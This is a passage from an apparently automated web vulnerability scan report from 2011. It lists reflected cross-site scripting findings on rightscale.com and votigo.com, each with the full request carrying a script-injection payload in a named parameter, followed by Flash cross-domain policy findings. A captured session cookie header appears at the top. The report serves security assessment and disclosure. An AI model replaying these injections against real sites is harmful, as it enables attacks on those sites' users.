Cookie: .ASPXANONYMOUS=bce5Z7JJzAEkAAAAMTA2NDMzOTEtOGY4Yi00Y2E0LTk5N2UtN2RmMjAwOWM0Mjc20; ASP.NET_SessionId=n2pxct2tag4iwgih2alnl545; HUBSPOT130=68228268.20480.0000; hubspotutktzo=-5; hubspotutk=a3ef224db6434804a3e24ca05d84f49f; hubspotvd=a3ef224db6434804a3e24ca05d84f49f; hubspotvw=a3ef224db6434804a3e24ca05d84f49f; hubspotvm=a3ef224db6434804a3e24ca05d84f49f; hsfirstvisit=http%3A%2F%2Fwww.hubspot.com%2Febooks%2Ffacebook-page-marketing-ebook-2011%2F%3Fsource%3Dhspd-InsideFacebook-200x200ad-201104|http%3A%2F%2Fwww.insidefacebook.com%2F|2011-05-15%2012%3A53%3A12; CR_4630_0=E1EF0BD5C395C5FF; hubspotdt=2011-05-15%2012%3A54%3A29; __ar_v4=YBTCZKMLVJGNJKSIKUO3HL%3A20110514%3A1%7CYNYIFZAM3NACFPVLCC56LA%3A20110514%3A2%7CSNWCKNCH3JFBBA3BHHHZOL%3A20110514%3A2%7CWU5STEO2IBFPDJIARLWYYE%3A20110514%3A1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45753
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sun, 15 May 2011 16:57:30 GMT
Connection: close

<!DOCTYPE html>

<html>
<head id="Head">

<script type="text/javascript">
//<![CDATA[
window.hubspot={splitTimes:{preHead:new Date()}};
//]]>
</script>
<meta id="Me
...[SNIP]...
ntactForm_10273_m66219:Biggest_Marketing_Challenge__c" class="StandardI AutoFormInput LeadGen_ContactForm_10273_m66219_AutoForm" id="LeadGen_ContactForm_10273_m66219_Biggest_Marketing_Challenge__c" >16368<script>alert(1)</script>396df5a84505c6ed9</textarea>
...[SNIP]...

3.15. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [campaign parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The value of the campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b2e"><script>alert(1)</script>6482c83223c was submitted in the campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000fteyf8b2e"><script>alert(1)</script>6482c83223c&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorship; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebook; path=/
Set-Cookie: cookie[RS_campaign]=70170000000fteyf8b2e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6482c83223c; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...
<input type="hidden" name="Campaign_ID" value="70170000000fteyf8b2e"><script>alert(1)</script>6482c83223c">
...[SNIP]...

3.16. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [campaign_status parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The value of the campaign_status request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b4c"><script>alert(1)</script>2642f86d018 was submitted in the campaign_status parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded80b4c"><script>alert(1)</script>2642f86d018&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorship; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebook; path=/
Set-Cookie: cookie[RS_campaign]=70170000000ftey; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded80b4c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2642f86d018; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...
<input type="hidden" name="member_status" value="Responded80b4c"><script>alert(1)</script>2642f86d018" />
...[SNIP]...

3.17. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [ls parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The value of the ls request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c24ae"><script>alert(1)</script>b2a40e7024c was submitted in the ls parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorshipc24ae"><script>alert(1)</script>b2a40e7024c&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorshipc24ae%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb2a40e7024c; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebook; path=/
Set-Cookie: cookie[RS_campaign]=70170000000ftey; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...
<input type="hidden" name="lead_source" value="Advertising/Sponsorshipc24ae"><script>alert(1)</script>b2a40e7024c">
...[SNIP]...

3.18. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa882"><script>alert(1)</script>e99b324cc41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming&aa882"><script>alert(1)</script>e99b324cc41=1 HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorship; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebook; path=/
Set-Cookie: cookie[RS_campaign]=70170000000ftey; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...
ip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming&aa882"><script>alert(1)</script>e99b324cc41=1?suc=1">
...[SNIP]...

3.19. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [sd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The value of the sd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0c85"><script>alert(1)</script>92ab90edf46 was submitted in the sd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebooka0c85"><script>alert(1)</script>92ab90edf46&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorship; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebooka0c85%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E92ab90edf46; path=/
Set-Cookie: cookie[RS_campaign]=70170000000ftey; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...
<input name="task_subject" id="task_ subject" type="hidden" value="InsideFacebooka0c85"><script>alert(1)</script>92ab90edf46 form submission" />
...[SNIP]...

3.20. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_campaign parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a7fa"><script>alert(1)</script>00f8df324c was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming9a7fa"><script>alert(1)</script>00f8df324c HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorship; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebook; path=/
Set-Cookie: cookie[RS_campaign]=70170000000ftey; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...
vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming9a7fa"><script>alert(1)</script>00f8df324c?suc=1">
...[SNIP]...

3.21. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_content parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0d36"><script>alert(1)</script>b6dd1964f59 was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200f0d36"><script>alert(1)</script>b6dd1964f59&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorship; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebook; path=/
Set-Cookie: cookie[RS_campaign]=70170000000ftey; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...
/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200f0d36"><script>alert(1)</script>b6dd1964f59&utm_campaign=SocialGaming?suc=1">
...[SNIP]...

3.22. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_medium parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eb85"><script>alert(1)</script>c54c45eba70 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner9eb85"><script>alert(1)</script>c54c45eba70&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorship; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebook; path=/
Set-Cookie: cookie[RS_campaign]=70170000000ftey; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...
ww.rightscale.com/lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner9eb85"><script>alert(1)</script>c54c45eba70&utm_content=200x200&utm_campaign=SocialGaming?suc=1">
...[SNIP]...

3.23. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php [utm_source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfae6"><script>alert(1)</script>bc3538aa5a6 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebookcfae6"><script>alert(1)</script>bc3538aa5a6&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorship; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebook; path=/
Set-Cookie: cookie[RS_campaign]=70170000000ftey; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...
L" value="http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebookcfae6"><script>alert(1)</script>bc3538aa5a6&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming?suc=1">
...[SNIP]...

3.24. http://www.votigo.com/corp/solutions/fbcontests.php [insidefacebook parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.votigo.com
Path:	/corp/solutions/fbcontests.php

Issue detail

The value of the insidefacebook request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c4a"><script>alert(1)</script>c8f23b12224 was submitted in the insidefacebook parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/solutions/fbcontests.php?insidefacebookb9c4a"><script>alert(1)</script>c8f23b12224 HTTP/1.1
Host: www.votigo.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NJMZMZS192.168.1.180CKMLK; path=/
Date: Sun, 15 May 2011 16:55:02 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Facebook Contes
...[SNIP]...
<a href="http://twitter.com/share?url=http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebookb9c4a"><script>alert(1)</script>c8f23b12224&text=Check%20out%20%40votigo%20for%20video%20contest%2C%20facebook%20contest%2C%20twitter%20contest%2C%20sweepstakes%20%26%20social%20media%20promotions.%20%23contest&related=votigo" target="_
...[SNIP]...

3.25. http://www.votigo.com/corp/solutions/fbcontests.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.votigo.com
Path:	/corp/solutions/fbcontests.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3bee"><script>alert(1)</script>50da1df71b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /corp/solutions/fbcontests.php?insidefacebook&b3bee"><script>alert(1)</script>50da1df71b5=1 HTTP/1.1
Host: www.votigo.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NJMZMZS192.168.1.180CKMLK; path=/
Date: Sun, 15 May 2011 16:55:31 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Facebook Contes
...[SNIP]...
<a href="http://twitter.com/share?url=http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook&b3bee"><script>alert(1)</script>50da1df71b5=1&text=Check%20out%20%40votigo%20for%20video%20contest%2C%20facebook%20contest%2C%20twitter%20contest%2C%20sweepstakes%20%26%20social%20media%20promotions.%20%23contest&related=votigo" target=
...[SNIP]...

4. Flash cross-domain policy previous next
There are 13 instances of this issue:

http://dis.us.criteo.com/crossdomain.xml
http://bstats.adbrite.com/crossdomain.xml
http://cdn.shoutlet.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://track.lfstmedia.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.lifestreetmedia.com/crossdomain.xml
http://www.votigo.com/crossdomain.xml
http://www.youtube.com/crossdomain.xml
http://hubspot.app1.hubspot.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://dis.us.criteo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dis.us.criteo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sun, 15 May 2011 16:53:36 GMT
Expires: Wed, 09 May 2012 16:53:36 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.2. http://bstats.adbrite.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

